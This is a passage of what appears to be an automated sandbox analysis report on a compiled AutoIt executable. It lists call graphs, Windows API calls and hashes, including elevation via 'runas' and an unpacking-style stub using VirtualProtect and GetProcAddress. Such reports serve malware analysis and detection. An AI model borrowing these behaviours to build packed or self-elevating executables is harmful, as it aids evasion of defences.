CloseHandle 107165->107160 107213 b6ffdc 107166->107213 107169 b6ffdc 59 API calls 107170 b6ff45 107169->107170 107171 b57667 59 API calls 107170->107171 107172 b6ff51 107171->107172 107173 b57bcc 59 API calls 107172->107173 107174 b5f796 107173->107174 107175 b70162 6 API calls 107174->107175 107175->107138 107177 b57667 59 API calls 107176->107177 107178 b65f97 107177->107178 107179 b57667 59 API calls 107178->107179 107180 b65f9f 107179->107180 107220 b65a9d 107180->107220 107183 b65a9d 59 API calls 107184 b65faf 107183->107184 107185 b57667 59 API calls 107184->107185 107186 b65fba 107185->107186 107187 b70db6 Mailbox 59 API calls 107186->107187 107188 b5f908 107187->107188 107189 b660f9 107188->107189 107190 b66107 107189->107190 107191 b57667 59 API calls 107190->107191 107192 b66112 107191->107192 107193 b57667 59 API calls 107192->107193 107194 b6611d 107193->107194 107195 b57667 59 API calls 107194->107195 107196 b66128 107195->107196 107197 b57667 59 API calls 107196->107197 107198 b66133 107197->107198 107199 b65a9d 59 API calls 107198->107199 107200 b6613e 107199->107200 107201 b70db6 Mailbox 59 API calls 107200->107201 107202 b66145 RegisterClipboardFormatW 107201->107202 107202->107152 107205 ba576f 107204->107205 107206 b6fdae 107204->107206 107223 bb9ae7 60 API calls 107205->107223 107207 b70db6 Mailbox 59 API calls 107206->107207 107210 b6fdb6 107207->107210 107209 ba577a 107210->107156 107211->107163 107212->107165 107224 bb71ed 65 API calls 107212->107224 107214 b57667 59 API calls 107213->107214 107215 b6ffe7 107214->107215 107216 b57667 59 API calls 107215->107216 107217 b6ffef 107216->107217 107218 b57667 59 API calls 107217->107218 107219 b6ff3b 107218->107219 107219->107169 107221 b57667 59 API calls 107220->107221 107222 b65aa5 107221->107222 107222->107183 107223->107209 107225 b8fdfc 107229 b5ab30 Mailbox _memmove 107225->107229 107227 ba617e Mailbox 59 API calls 107242 b5a057 107227->107242 107230 b5b525 107229->107230 107229->107242 107251 b57de1 59 API calls 107229->107251 107254 b59f37 Mailbox 107229->107254 107256 bcbc6b 341 API calls 107229->107256 107258 b70db6 59 API calls Mailbox 107229->107258 107259 b5b2b6 107229->107259 107260 b59ea0 341 API calls 107229->107260 107262 b9086a 107229->107262 107264 b90878 107229->107264 107266 b9085c 107229->107266 107267 b5b21c 107229->107267 107270 ba6e8f 59 API calls 107229->107270 107275 bbd07b 107229->107275 107322 b61fc3 107229->107322 107362 bcdf23 107229->107362 107365 bcc2e0 107229->107365 107397 bb7956 107229->107397 107403 ba617e 107229->107403 107408 b59c90 59 API calls Mailbox 107229->107408 107412 bcc193 85 API calls 2 library calls 107229->107412 107414 bb9e4a 89 API calls 4 library calls 107230->107414 107233 b70db6 59 API calls Mailbox 107233->107254 107234 b909e5 107419 bb9e4a 89 API calls 4 library calls 107234->107419 107235 b90055 107413 bb9e4a 89 API calls 4 library calls 107235->107413 107237 b5b475 107243 b58047 59 API calls 107237->107243 107240 b58047 59 API calls 107240->107254 107241 b90064 107243->107242 107245 b5b47a 107245->107234 107245->107235 107248 b57667 59 API calls 107248->107254 107249 ba6e8f 59 API calls 107249->107254 107250 b72d40 67 API calls __cinit 107250->107254 107251->107229 107252 b909d6 107418 bb9e4a 89 API calls 4 library calls 107252->107418 107254->107233 107254->107235 107254->107237 107254->107240 107254->107242 107254->107245 107254->107248 107254->107249 107254->107250 107254->107252 107255 b5a55a 107254->107255 107406 b5c8c0 341 API calls 2 library calls 107254->107406 107407 b5b900 60 API calls Mailbox 107254->107407 107417 bb9e4a 89 API calls 4 library calls 107255->107417 107256->107229 107258->107229 107411 b5f6a3 341 API calls 107259->107411 107260->107229 107415 b59c90 59 API calls Mailbox 107262->107415 107416 bb9e4a 89 API calls 4 library calls 107264->107416 107266->107227 107266->107242 107409 b59d3c 60 API calls Mailbox 107267->107409 107269 b5b22d 107410 b59d3c 60 API calls Mailbox 107269->107410 107270->107229 107276 bbd0a5 107275->107276 107277 bbd09a 107275->107277 107280 b57667 59 API calls 107276->107280 107320 bbd17f Mailbox 107276->107320 107278 b59b3c 59 API calls 107277->107278 107278->107276 107279 b70db6 Mailbox 59 API calls 107281 bbd1c8 107279->107281 107282 bbd0c9 107280->107282 107283 bbd1d4 107281->107283 107421 b557a6 60 API calls Mailbox 107281->107421 107284 b57667 59 API calls 107282->107284 107286 b59837 84 API calls 107283->107286 107287 bbd0d2 107284->107287 107288 bbd1ec 107286->107288 107289 b59837 84 API calls 107287->107289 107290 b557f6 67 API calls 107288->107290 107291 bbd0de 107289->107291 107292 bbd1fb 107290->107292 107293 b5459b 59 API calls 107291->107293 107294 bbd1ff GetLastError 107292->107294 107299 bbd233 107292->107299 107295 bbd0f3 107293->107295 107301 bbd218 107294->107301 107296 b57b2e 59 API calls 107295->107296 107303 bbd126 107296->107303 107297 bbd25e 107300 b70db6 Mailbox 59 API calls 107297->107300 107298 bbd295 107304 b70db6 Mailbox 59 API calls 107298->107304 107299->107297 107299->107298 107305 bbd263 107300->107305 107317 bbd188 Mailbox 107301->107317 107422 b558ba CloseHandle 107301->107422 107302 bbd178 107307 b59b3c 59 API calls 107302->107307 107303->107302 107308 bb3c37 3 API calls 107303->107308 107309 bbd29a 107304->107309 107310 bbd274 107305->107310 107313 b57667 59 API calls 107305->107313 107307->107320 107311 bbd136 107308->107311 107312 b57667 59 API calls 107309->107312 107309->107317 107423 bcfbce 59 API calls 2 library calls 107310->107423 107311->107302 107314 bbd13a 107311->107314 107312->107317 107313->107310 107316 b57de1 59 API calls 107314->107316 107318 bbd147 107316->107318 107317->107229 107420 bb3a2a 63 API calls Mailbox 107318->107420 107320->107279 107320->107317 107321 bbd150 Mailbox 107321->107302 107323 b59a98 59 API calls 107322->107323 107324 b61fdb 107323->107324 107326 b70db6 Mailbox 59 API calls 107324->107326 107329 b96585 107324->107329 107327 b61ff4 107326->107327 107330 b62004 107327->107330 107439 b557a6 60 API calls Mailbox 107327->107439 107328 b62029 107333 b59b3c 59 API calls 107328->107333 107337 b62036 107328->107337 107329->107328 107443 bbf574 59 API calls 107329->107443 107332 b59837 84 API calls 107330->107332 107334 b62012 107332->107334 107335 b965cd 107333->107335 107336 b557f6 67 API calls 107334->107336 107335->107337 107338 b965d5 107335->107338 107339 b62021 107336->107339 107340 b55cdf 2 API calls 107337->107340 107341 b59b3c 59 API calls 107338->107341 107339->107328 107339->107329 107442 b558ba CloseHandle 107339->107442 107343 b6203d 107340->107343 107341->107343 107344 b62057 107343->107344 107345 b965e7 107343->107345 107346 b57667 59 API calls 107344->107346 107347 b70db6 Mailbox 59 API calls 107345->107347 107348 b6205f 107346->107348 107349 b965ed 107347->107349 107424 b55572 107348->107424 107351 b96601 107349->107351 107444 b55850 ReadFile SetFilePointerEx 107349->107444 107356 b96605 _memmove 107351->107356 107445 bb76c4 59 API calls 2 library calls 107351->107445 107353 b6206e 107353->107356 107440 b59a3c 59 API calls Mailbox 107353->107440 107357 b62082 Mailbox 107358 b620bc 107357->107358 107359 b55c6f CloseHandle 107357->107359 107358->107229 107360 b620b0 107359->107360 107360->107358 107441 b558ba CloseHandle 107360->107441 107363 bccadd 130 API calls 107362->107363 107364 bcdf33 107363->107364 107364->107229 107366 b57667 59 API calls 107365->107366 107367 bcc2f4 107366->107367 107368 b57667 59 API calls 107367->107368 107369 bcc2fc 107368->107369 107370 b57667 59 API calls 107369->107370 107371 bcc304 107370->107371 107372 b59837 84 API calls 107371->107372 107396 bcc312 107372->107396 107373 b57bcc 59 API calls 107373->107396 107374 bcc4fb 107375 bcc528 Mailbox 107374->107375 107485 b59a3c 59 API calls Mailbox 107374->107485 107375->107229 107376 bcc4e2 107380 b57cab 59 API calls 107376->107380 107378 bcc4fd 107381 b57cab 59 API calls 107378->107381 107379 b58047 59 API calls 107379->107396 107382 bcc4ef 107380->107382 107384 bcc50c 107381->107384 107386 b57b2e 59 API calls 107382->107386 107383 b57924 59 API calls 107383->107396 107387 b57b2e 59 API calls 107384->107387 107385 b57e4f 59 API calls 107389 bcc3a9 CharUpperBuffW 107385->107389 107386->107374 107387->107374 107388 b57e4f 59 API calls 107390 bcc469 CharUpperBuffW 107388->107390 107483 b5843a 68 API calls 107389->107483 107484 b5c5a7 69 API calls 2 library calls 107390->107484 107393 b57cab 59 API calls 107393->107396 107394 b59837 84 API calls 107394->107396 107395 b57b2e 59 API calls 107395->107396 107396->107373 107396->107374 107396->107375 107396->107376 107396->107378 107396->107379 107396->107383 107396->107385 107396->107388 107396->107393 107396->107394 107396->107395 107398 bb7962 107397->107398 107399 b70db6 Mailbox 59 API calls 107398->107399 107400 bb7970 107399->107400 107401 bb797e 107400->107401 107402 b57667 59 API calls 107400->107402 107401->107229 107402->107401 107486 ba60c0 107403->107486 107405 ba618c 107405->107229 107406->107254 107407->107254 107408->107229 107409->107269 107410->107259 107411->107230 107412->107229 107413->107241 107414->107266 107415->107266 107416->107266 107417->107242 107418->107234 107419->107242 107420->107321 107421->107283 107422->107317 107423->107317 107425 b555a2 107424->107425 107426 b5557d 107424->107426 107427 b57d8c 59 API calls 107425->107427 107426->107425 107430 b5558c 107426->107430 107431 bb325e 107427->107431 107429 bb328d 107429->107353 107448 b55ab8 107430->107448 107431->107429 107446 bb31fa ReadFile SetFilePointerEx 107431->107446 107447 b57924 59 API calls 2 library calls 107431->107447 107438 bb339c Mailbox 107438->107353 107439->107330 107440->107357 107441->107358 107442->107329 107443->107329 107444->107351 107445->107356 107446->107431 107447->107431 107449 b70db6 Mailbox 59 API calls 107448->107449 107450 b55acb 107449->107450 107451 b70db6 Mailbox 59 API calls 107450->107451 107452 b55ad7 107451->107452 107453 b554d2 107452->107453 107460 b558cf 107453->107460 107455 b55514 107455->107438 107459 b577da 61 API calls Mailbox 107455->107459 107456 b55bc0 2 API calls 107457 b554e3 107456->107457 107457->107455 107457->107456 107467 b55a7a 107457->107467 107459->107438 107461 b8dc3c 107460->107461 107462 b558e0 107460->107462 107476 ba5ecd 59 API calls Mailbox 107461->107476 107462->107457 107464 b8dc46 107465 b70db6 Mailbox 59 API calls 107464->107465 107466 b8dc52 107465->107466 107468 b8dcee 107467->107468 107469 b55a8e 107467->107469 107482 ba5ecd 59 API calls Mailbox 107468->107482 107477 b559b9 107469->107477 107472 b55a9a 107472->107457 107473 b8dcf9 107474 b70db6 Mailbox 59 API calls 107473->107474 107475 b8dd0e _memmove 107474->107475 107476->107464 107478 b559d1 107477->107478 107481 b559ca _memmove 107477->107481 107479 b70db6 Mailbox 59 API calls 107478->107479 107480 b8dc7e 107478->107480 107479->107481 107481->107472 107482->107473 107483->107396 107484->107396 107485->107375 107487 ba60cb 107486->107487 107488 ba60e8 107486->107488 107487->107488 107490 ba60ab 59 API calls Mailbox 107487->107490 107488->107405 107490->107487 107491 b53633 107492 b5366a 107491->107492 107493 b536e7 107492->107493 107494 b53688 107492->107494 107529 b536e5 107492->107529 107498 b8d0cc 107493->107498 107499 b536ed 107493->107499 107495 b53695 107494->107495 107496 b5374b PostQuitMessage 107494->107496 107501 b536a0 107495->107501 107502 b8d154 107495->107502 107533 b536d8 107496->107533 107497 b536ca NtdllDefWindowProc_W 107497->107533 107540 b61070 10 API calls Mailbox 107498->107540 107503 b53715 SetTimer RegisterClipboardFormatW 107499->107503 107504 b536f2 107499->107504 107506 b53755 107501->107506 107507 b536a8 107501->107507 107545 bb2527 71 API calls _memset 107502->107545 107508 b5373e CreatePopupMenu 107503->107508 107503->107533 107510 b8d06f 107504->107510 107511 b536f9 KillTimer 107504->107511 107505 b8d0f3 107541 b61093 341 API calls Mailbox 107505->107541 107538 b544a0 64 API calls _memset 107506->107538 107513 b8d139 107507->107513 107514 b536b3 107507->107514 107508->107533 107517 b8d0a8 MoveWindow 107510->107517 107518 b8d074 107510->107518 107536 b5443a Shell_NotifyIconW _memset 107511->107536 107513->107497 107544 ba7c36 59 API calls Mailbox 107513->107544 107520 b8d124 107514->107520 107526 b536be 107514->107526 107515 b8d166 107515->107497 107515->107533 107517->107533 107521 b8d078 107518->107521 107522 b8d097 SetFocus 107518->107522 107543 bb2d36 81 API calls _memset 107520->107543 107521->107526 107527 b8d081 107521->107527 107522->107533 107523 b5370c 107537 b53114 DeleteObject DestroyWindow Mailbox 107523->107537 107526->107497 107542 b5443a Shell_NotifyIconW _memset 107526->107542 107539 b61070 10 API calls Mailbox 107527->107539 107529->107497 107531 b53764 107531->107533 107534 b8d118 107535 b5434a 68 API calls 107534->107535 107535->107529 107536->107523 107537->107533 107538->107531 107539->107533 107540->107505 107541->107526 107542->107534 107543->107531 107544->107529 107545->107515 107546 cb2a60 107547 cb2a70 107546->107547 107548 cb2b8a LoadLibraryA 107547->107548 107551 cb2bcf VirtualProtect VirtualProtect 107547->107551 107549 cb2ba1 107548->107549 107549->107547 107553 cb2bb3 GetProcAddress 107549->107553 107552 cb2c34 107551->107552 107552->107552 107553->107549 107554 cb2bc9 ExitProcess 107553->107554 107555 b51078 107560 b5708b 107555->107560 107557 b5108c 107558 b72d40 __cinit 67 API calls 107557->107558 107559 b51096 107558->107559 107561 b5709b __write_nolock 107560->107561 107562 b57667 59 API calls 107561->107562 107563 b57151 107562->107563 107564 b54706 61 API calls 107563->107564 107565 b5715a 107564->107565 107591 b7050b 107565->107591 107568 b57cab 59 API calls 107569 b57173 107568->107569 107570 b53f74 59 API calls 107569->107570 107571 b57182 107570->107571 107572 b57667 59 API calls 107571->107572 107573 b5718b 107572->107573 107574 b57d8c 59 API calls 107573->107574 107575 b57194 RegOpenKeyExW 107574->107575 107576 b8e8b1 RegQueryValueExW 107575->107576 107580 b571b6 Mailbox 107575->107580 107577 b8e8ce 107576->107577 107578 b8e943 RegCloseKey 107576->107578 107579 b70db6 Mailbox 59 API calls 107577->107579 107578->107580 107590 b8e955 _wcscat Mailbox __NMSG_WRITE 107578->107590 107581 b8e8e7 107579->107581 107580->107557 107583 b5522e 59 API calls 107581->107583 107582 b579f2 59 API calls 107582->107590 107584 b8e8f2 RegQueryValueExW 107583->107584 107585 b8e90f 107584->107585 107587 b8e929 107584->107587 107586 b57bcc 59 API calls 107585->107586 107586->107587 107587->107578 107588 b57de1 59 API calls 107588->107590 107589 b53f74 59 API calls 107589->107590 107590->107580 107590->107582 107590->107588 107590->107589 107592 b81940 __write_nolock 107591->107592 107593 b70518 GetFullPathNameW 107592->107593 107594 b7053a 107593->107594 107595 b57bcc 59 API calls 107594->107595 107596 b57165 107595->107596 107596->107568 107597 b5e5ab 107600 b5d100 107597->107600 107599 b5e5b9 107601 b5d11d 107600->107601 107629 b5d37d 107600->107629 107602 b92691 107601->107602 107603 b926e0 107601->107603 107632 b5d144 107601->107632 107606 b92694 107602->107606 107614 b926af 107602->107614 107644 bca3e6 341 API calls __cinit 107603->107644 107607 b926a0 107606->107607 107606->107632 107642 bca9fa 341 API calls 107607->107642 107608 b72d40 __cinit 67 API calls 107608->107632 107611 b5d434 107636 b58a52 68 API calls 107611->107636 107612 b928b5 107612->107612 107613 b5d54b 107613->107599 107614->107629 107643 bcaea2 341 API calls 3 library calls 107614->107643 107618 b5d443 107618->107599 107619 b927fc 107648 bca751 89 API calls 107619->107648 107622 b584c0 69 API calls 107622->107632 107629->107613 107649 bb9e4a 89 API calls 4 library calls 107629->107649 107630 b59ea0 341 API calls 107630->107632 107631 b58047 59 API calls 107631->107632 107632->107608 107632->107611 107632->107613 107632->107619 107632->107622 107632->107629 107632->107630 107632->107631 107634 b58740 68 API calls __cinit 107632->107634 107635 b58542 68 API calls 107632->107635 107637 b5843a 68 API calls 107632->107637 107638 b5cf7c 341 API calls 107632->107638 107639 b59dda 59 API calls Mailbox 107632->107639 107640 b5cf00 89 API calls 107632->107640 107641 b5cd7d 341 API calls 107632->107641 107645 b58a52 68 API calls 107632->107645 107646 b59d3c 60 API calls Mailbox 107632->107646 107647 ba678d 60 API calls 107632->107647 107634->107632 107635->107632 107636->107618 107637->107632 107638->107632 107639->107632 107640->107632 107641->107632 107642->107613 107643->107629 107644->107632 107645->107632 107646->107632 107647->107632 107648->107629 107649->107612 107650 b5552a 107651 b55ab8 59 API calls 107650->107651 107652 b5553c 107651->107652 107653 b554d2 61 API calls 107652->107653 107654 b5554a 107653->107654 107656 b5555a Mailbox 107654->107656 107657 b58061 61 API calls Mailbox 107654->107657 107657->107656

                                              Executed Functions

                                              Function 00B53B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B53B68
                                              • IsDebuggerPresent.KERNEL32 ref: 00B53B7A
                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00C152F8,00C152E0,?,?), ref: 00B53BEB
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                • Part of subcall function 00B6092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B53C14,00C152F8,?,?,?), ref: 00B6096E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B53C6F
                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C07770,00000010), ref: 00B8D281
                                              • SetCurrentDirectoryW.KERNEL32(?,00C152F8,?,?,?), ref: 00B8D2B9
                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C04260,00C152F8,?,?,?), ref: 00B8D33F
                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00B8D346
                                                • Part of subcall function 00B53A46: GetSysColorBrush.USER32(0000000F), ref: 00B53A50
                                                • Part of subcall function 00B53A46: LoadCursorW.USER32(00000000,00007F00), ref: 00B53A5F
                                                • Part of subcall function 00B53A46: LoadIconW.USER32(00000063), ref: 00B53A76
                                                • Part of subcall function 00B53A46: LoadIconW.USER32(000000A4), ref: 00B53A88
                                                • Part of subcall function 00B53A46: LoadIconW.USER32(000000A2), ref: 00B53A9A
                                                • Part of subcall function 00B53A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B53AC0
                                                • Part of subcall function 00B53A46: RegisterClassExW.USER32(?), ref: 00B53B16
                                                • Part of subcall function 00B539D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B53A03
                                                • Part of subcall function 00B539D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B53A24
                                                • Part of subcall function 00B539D5: ShowWindow.USER32(00000000,?,?), ref: 00B53A38
                                                • Part of subcall function 00B539D5: ShowWindow.USER32(00000000,?,?), ref: 00B53A41
                                                • Part of subcall function 00B5434A: _memset.LIBCMT ref: 00B54370
                                                • Part of subcall function 00B5434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B54415
                                              Strings
                                              • This is a third-party compiled AutoIt script., xrefs: 00B8D279
                                              • runas, xrefs: 00B8D33A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                              • API String ID: 529118366-3287110873
                                              • Opcode ID: a22cf691f5ee570915250ec48cd9d4b491797b99c62f462a7098d98f5016a75e
                                              • Instruction ID: f2358336adf61647857a3442c2a1330213cf40bb9ebeca1fb73897be9766e568
                                              • Opcode Fuzzy Hash: a22cf691f5ee570915250ec48cd9d4b491797b99c62f462a7098d98f5016a75e
                                              • Instruction Fuzzy Hash: E651D771E48209EADF11EBB4DC55BED7BF4EB46741F0080E6F811A32A1DA705649CB21
                                              Function 00B53633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 765 b53633-b53681 767 b536e1-b536e3 765->767 768 b53683-b53686 765->768 767->768 771 b536e5 767->771 769 b536e7 768->769 770 b53688-b5368f 768->770 775 b8d0cc-b8d0fa call b61070 call b61093 769->775 776 b536ed-b536f0 769->776 772 b53695-b5369a 770->772 773 b5374b-b53753 PostQuitMessage 770->773 774 b536ca-b536d2 NtdllDefWindowProc_W 771->774 778 b536a0-b536a2 772->778 779 b8d154-b8d168 call bb2527 772->779 780 b53711-b53713 773->780 781 b536d8-b536de 774->781 810 b8d0ff-b8d106 775->810 782 b53715-b5373c SetTimer RegisterClipboardFormatW 776->782 783 b536f2-b536f3 776->783 785 b53755-b53764 call b544a0 778->785 786 b536a8-b536ad 778->786 779->780 803 b8d16e 779->803 780->781 782->780 787 b5373e-b53749 CreatePopupMenu 782->787 789 b8d06f-b8d072 783->789 790 b536f9-b5370c KillTimer call b5443a call b53114 783->790 785->780 792 b8d139-b8d140 786->792 793 b536b3-b536b8 786->793 787->780 796 b8d0a8-b8d0c7 MoveWindow 789->796 797 b8d074-b8d076 789->797 790->780 792->774 799 b8d146-b8d14f call ba7c36 792->799 801 b536be-b536c4 793->801 802 b8d124-b8d134 call bb2d36 793->802 796->780 805 b8d078-b8d07b 797->805 806 b8d097-b8d0a3 SetFocus 797->806 799->774 801->774 801->810 802->780 803->774 805->801 811 b8d081-b8d092 call b61070 805->811 806->780 810->774 814 b8d10c-b8d11f call b5443a call b5434a 810->814 811->780 814->774
                                              APIs
                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00B536D2
                                              • KillTimer.USER32(?,00000001), ref: 00B536FC
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B5371F
                                              • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B5372A
                                              • CreatePopupMenu.USER32 ref: 00B5373E
                                              • PostQuitMessage.USER32(00000000), ref: 00B5374D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                              • String ID: TaskbarCreated
                                              • API String ID: 157504867-2362178303
                                              • Opcode ID: 3d8a50a919a67ad374dd52bd80df8db0b748cca966427aee0ca00c677a23c7d4
                                              • Instruction ID: 91ddd5d12f022b534c15da0734c42e2a78431dc73081d16e03203f96ca528fc6
                                              • Opcode Fuzzy Hash: 3d8a50a919a67ad374dd52bd80df8db0b748cca966427aee0ca00c677a23c7d4
                                              • Instruction Fuzzy Hash: 914146B2608505EBDB106F64DC49BFD37D4EB86782F1401EAFD02963E1DA709E499321
                                              Function 00B549A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 948 b549a0-b54a00 call b57667 GetVersionExW call b57bcc 953 b54a06 948->953 954 b54b0b-b54b0d 948->954 955 b54a09-b54a0e 953->955 956 b8d767-b8d773 954->956 958 b54a14 955->958 959 b54b12-b54b13 955->959 957 b8d774-b8d778 956->957 960 b8d77a 957->960 961 b8d77b-b8d787 957->961 962 b54a15-b54a4c call b57d2c call b57726 958->962 959->962 960->961 961->957 963 b8d789-b8d78e 961->963 971 b54a52-b54a53 962->971 972 b8d864-b8d867 962->972 963->955 965 b8d794-b8d79b 963->965 965->956 967 b8d79d 965->967 970 b8d7a2-b8d7a5 967->970 973 b8d7ab-b8d7c9 970->973 974 b54a93-b54aaa GetCurrentProcess IsWow64Process 970->974 971->970 975 b54a59-b54a64 971->975 976 b8d869 972->976 977 b8d880-b8d884 972->977 973->974 978 b8d7cf-b8d7d5 973->978 984 b54aac 974->984 985 b54aaf-b54ac0 974->985 979 b8d7ea-b8d7f0 975->979 980 b54a6a-b54a6c 975->980 981 b8d86c 976->981 982 b8d86f-b8d878 977->982 983 b8d886-b8d88f 977->983 988 b8d7df-b8d7e5 978->988 989 b8d7d7-b8d7da 978->989 992 b8d7fa-b8d800 979->992 993 b8d7f2-b8d7f5 979->993 990 b54a72-b54a75 980->990 991 b8d805-b8d811 980->991 981->982 982->977 983->981 994 b8d891-b8d894 983->994 984->985 986 b54ac2-b54ad2 call b54b37 985->986 987 b54b2b-b54b35 GetSystemInfo 985->987 1005 b54ad4-b54ae1 call b54b37 986->1005 1006 b54b1f-b54b29 GetSystemInfo 986->1006 1000 b54af8-b54b08 987->1000 988->974 989->974 998 b8d831-b8d834 990->998 999 b54a7b-b54a8a 990->999 995 b8d81b-b8d821 991->995 996 b8d813-b8d816 991->996 992->974 993->974 994->982 995->974 996->974 998->974 1002 b8d83a-b8d84f 998->1002 1003 b54a90 999->1003 1004 b8d826-b8d82c 999->1004 1007 b8d859-b8d85f 1002->1007 1008 b8d851-b8d854 1002->1008 1003->974 1004->974 1013 b54ae3-b54ae7 GetNativeSystemInfo 1005->1013 1014 b54b18-b54b1d 1005->1014 1010 b54ae9-b54aed 1006->1010 1007->974 1008->974 1010->1000 1012 b54aef-b54af2 FreeLibrary 1010->1012 1012->1000 1013->1010 1014->1013
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 00B549CD
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              • GetCurrentProcess.KERNEL32(?,00BDFAEC,00000000,00000000,?), ref: 00B54A9A
                                              • IsWow64Process.KERNEL32(00000000), ref: 00B54AA1
                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00B54AE7
                                              • FreeLibrary.KERNEL32(00000000), ref: 00B54AF2
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00B54B23
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00B54B2F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                              • String ID:
                                              • API String ID: 1986165174-0
                                              • Opcode ID: 48ea6e9e2fc457bb20246a5e149ec6d74e68c86d625acb1246d91ec75fadcfbc
                                              • Instruction ID: 13d948d2faf39dfa44346c496186d2508432f5bf0d5d287b6e7a90111d17d41d
                                              • Opcode Fuzzy Hash: 48ea6e9e2fc457bb20246a5e149ec6d74e68c86d625acb1246d91ec75fadcfbc
                                              • Instruction Fuzzy Hash: 6991E43198E7C1DEC731DB6894902AAFFF5AF2A305B0449EED4CB93A41D720A94CC759
                                              Function 00B54E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                              Download Yara Rule

